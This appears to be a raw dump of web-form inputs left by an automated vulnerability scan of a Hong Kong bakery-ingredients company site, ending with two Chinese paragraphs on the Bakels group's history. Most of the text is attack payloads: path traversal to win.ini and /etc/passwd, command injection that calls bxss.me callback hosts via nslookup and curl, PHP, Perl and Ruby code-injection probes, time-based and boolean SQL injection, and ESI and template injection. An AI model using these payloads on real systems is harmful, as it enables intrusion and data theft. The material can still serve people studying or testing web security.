unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://xfs.bxss.me?hkbakels.com.hk

931135

Http://bxss.me/t/fit.txt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


;(nslookup -q=cname hittqbxxeczsoa1ead.bxss.me||curl hittqbxxeczsoa1ead.bxss.me)|(nslookup -q=cname hittqbxxeczsoa1ead.bxss.me||curl hittqbxxeczsoa1ead.bxss.me)&(nslookup -q=cname hittqbxxeczsoa1ead.bxss.me||curl hittqbxxeczsoa1ead.bxss.me)

xfs.bxss.me

`(nslookup -q=cname hitrcnnjkqdgmdcf0e.bxss.me||curl hitrcnnjkqdgmdcf0e.bxss.me)`

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

|(nslookup -q=cname hiteminnvlkmg85e28.bxss.me||curl hiteminnvlkmg85e28.bxss.me)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

&(nslookup -q=cname hitdksrzyyyducb121.bxss.me||curl hitdksrzyyyducb121.bxss.me)&'\"`0&(nslookup -q=cname hitdksrzyyyducb121.bxss.me||curl hitdksrzyyyducb121.bxss.me)&`'

&nslookup -q=cname hitbzlyunwwth7be0b.bxss.me&'\"`0&nslookup -q=cname hitbzlyunwwth7be0b.bxss.me&`'

..\..\..\..\..\..\..\..\windows\win.ini

$(nslookup -q=cname hityharajuhdx90fb5.bxss.me||curl hityharajuhdx90fb5.bxss.me)

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

(nslookup -q=cname hitqfrqscrjpf9b212.bxss.me||curl hitqfrqscrjpf9b212.bxss.me))

|echo ljqveu$()\ rmpkgn\nz^xyu||a #' |echo ljqveu$()\ rmpkgn\nz^xyu||a #|" |echo ljqveu$()\ rmpkgn\nz^xyu||a #

/../../../../../../../../../../boot.ini

&echo clncoq$()\ yfqnov\nz^xyu||a #' &echo clncoq$()\ yfqnov\nz^xyu||a #|" &echo clncoq$()\ yfqnov\nz^xyu||a #

../../../../../../../../../../windows/win.ini%00.jpg


echo ljcglw$()\ dpexlg\nz^xyu||a #' &echo ljcglw$()\ dpexlg\nz^xyu||a #|" &echo ljcglw$()\ dpexlg\nz^xyu||a #

C:\WINDOWS\system32\drivers\etc\hosts

'+'A'.concat(70-3).concat(22*4).concat(99).concat(78).concat(99).concat(79)+(require'socket'

Socket.gethostbyname('hitag'+'kvivpoayd12bd.bxss.me.')[3].to_s)+'

file:///etc/passwd

"+"A".concat(70-3).concat(22*4).concat(119).concat(66).concat(104).concat(65)+(require"socket"

Socket.gethostbyname("hitti"+"wachcdjn4fea3.bxss.me.")[3].to_s)+"

../../../../../../../../../../../../../../windows/win.ini

"+response.write(9246741*9660928)+"

'+response.write(9246741*9660928)+'

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00


response.write(9246741*9660928)

../../../../../../../../../../../../../../etc/passwd

'+'A'.concat(70-3).concat(22*4).concat(114).concat(84).concat(120).concat(79)+(require'socket'

"+"A".concat(70-3).concat(22*4).concat(101).concat(86).concat(111).concat(77)+(require"socket"

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

bxss.me

c:/windows/win.ini

/etc/shells

1-1)); waitfor delay '0:0:15' --

"+response.write(9604671*9153935)+"

http://bxss.me/t/fit.txt%3F.jpg

'+response.write(9604671*9153935)+'

Http://bxss.me/t/fit.txt

response.write(9604671*9153935)

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

${10000369+9999339}

${9999251+9999508}


<esi:include src="http://bxss.me/rpb.png"/>

<esi:include src="http://bxss.me/rpb.png"/>

WEB-INF\web.xml

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

WEB-INF/web.xml

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

..\..\..\..\..\..\..\..\windows\win.ini

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

/../../../../../../../../../../boot.ini

;(nslookup -q=cname hitpevpenkwuic1f33.bxss.me||curl hitpevpenkwuic1f33.bxss.me)|(nslookup -q=cname hitpevpenkwuic1f33.bxss.me||curl hitpevpenkwuic1f33.bxss.me)&(nslookup -q=cname hitpevpenkwuic1f33.bxss.me||curl hitpevpenkwuic1f33.bxss.me)

../../../../../../../../../../windows/win.ini%00.jpg

C:\WINDOWS\system32\drivers\etc\hosts

`(nslookup -q=cname hitfrbbxryfuv66c86.bxss.me||curl hitfrbbxryfuv66c86.bxss.me)`

|(nslookup -q=cname hitsjlkrirgsp6b5fb.bxss.me||curl hitsjlkrirgsp6b5fb.bxss.me)

&(nslookup -q=cname hitvqztjscipufd762.bxss.me||curl hitvqztjscipufd762.bxss.me)&'\"`0&(nslookup -q=cname hitvqztjscipufd762.bxss.me||curl hitvqztjscipufd762.bxss.me)&`'

file:///etc/passwd

'.print(md5(31337)).'

&nslookup -q=cname hitcjogslbkendf794.bxss.me&'\"`0&nslookup -q=cname hitcjogslbkendf794.bxss.me&`'

${@print(md5(31337))}\

${@print(md5(31337))}

../../../../../../../../../../../../../../windows/win.ini

1-1); waitfor delay '0:0:15' --

$(nslookup -q=cname hityhqrjfgfxdff652.bxss.me||curl hityhqrjfgfxdff652.bxss.me)

";print(md5(31337));$a="

';print(md5(31337));$a='

(nslookup -q=cname hityblrbtpetm95bdf.bxss.me||curl hityblrbtpetm95bdf.bxss.me))

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

|echo xahvjl$()\ rperby\nz^xyu||a #' |echo xahvjl$()\ rperby\nz^xyu||a #|" |echo xahvjl$()\ rperby\nz^xyu||a #

../../../../../../../../../../../../../../etc/passwd

&echo aohghf$()\ wlhzds\nz^xyu||a #' &echo aohghf$()\ wlhzds\nz^xyu||a #|" &echo aohghf$()\ wlhzds\nz^xyu||a #

echo meqydc$()\ bznpkn\nz^xyu||a #' &echo meqydc$()\ bznpkn\nz^xyu||a #|" &echo meqydc$()\ bznpkn\nz^xyu||a #

/../../../../../../../../../../windows/system32/BITSADMIN.exe

/../../../../../../../../../../windows/system32/BITSADMIN.exe

IxImz4Lg

ixdgq47C

"||sleep(27*1000)*iwsxib||"

'||sleep(27*1000)*wjoyjg||'

&n967359=v910687

"&&sleep(27*1000)*shxwsu&&"

'&&sleep(27*1000)*mxmeee&&'

'"()

&n918252=v944516

'.print(md5(31337)).'

${@print(md5(31337))}\

^(#$!@#$)(()))******

${@print(md5(31337))}

!(()&&!|*|*|

)

";print(md5(31337));$a="

".gethostbyname(lc("hitwk"."amftpyxi974ae.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(81).chr(113).chr(85)."

';print(md5(31337));$a='

'.gethostbyname(lc('hittt'.'ovrlipla44887.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(85).chr(117).chr(72).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1-1; waitfor delay '0:0:15' --

".gethostbyname(lc("hitus"."qxvfpdwf47c76.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(85).chr(105).chr(89)."

'.gethostbyname(lc('hitce'.'ubxiiuve3a6b8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(75).chr(113).chr(83).'

"||sleep(27*1000)*hucjlj||"

'||sleep(27*1000)*tufpfg||'

"&&sleep(27*1000)*vhcmss&&"

^(#$!@#$)(()))******

'&&sleep(27*1000)*pettwu&&'

!(()&&!|*|*|

'"()

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+175-175) --

-1" OR 3*2<(0+5+175-175) --

-1" OR 3+175-175-1=0+0+0+1 --

-1" OR 2+175-175-1=0+0+0+1 --

-1' OR 3*2>(0+5+280-280) or 'xUYAkhyU'='

-1' OR 3*2<(0+5+280-280) or 'xUYAkhyU'='

-1' OR 3+280-280-1=0+0+0+1 or 'xUYAkhyU'='

-1' OR 2+280-280-1=0+0+0+1 or 'xUYAkhyU'='

-1' OR 3*2>(0+5+300-300) --

-1' OR 3*2<(0+5+300-300) --

-1' OR 3+300-300-1=0+0+0+1 --

-1' OR 2+300-300-1=0+0+0+1 --

-1 OR 3*2>(0+5+290-290)

-1 OR 3*2<(0+5+290-290)

-1 OR 3+290-290-1=0+0+0+1

-1 OR 2+290-290-1=0+0+0+1

-1 OR 3*2>(0+5+63-63) --

-1 OR 3*2<(0+5+63-63) --

-1 OR 3+63-63-1=0+0+0+1 --

-1 OR 2+63-63-1=0+0+0+1 --

11e9mAkz1

1eT6bNyaO

1yHGEP7LO

Bernard-bakels

碧琪集團的名字來源於荷蘭商人 Bakels 兄弟于1904年在荷蘭阿姆斯特丹註冊的碧琪公司。其中的一個兄弟 Bernard J. Bakels 使碧琪聲名遠揚。

今天的碧琪集團是一個名符其實的全球性公司,在全球各地都有生產廠家和精挑細選的代理商。碧琪公司的產品在120多個國家都有銷售,供烘焙食品行使用。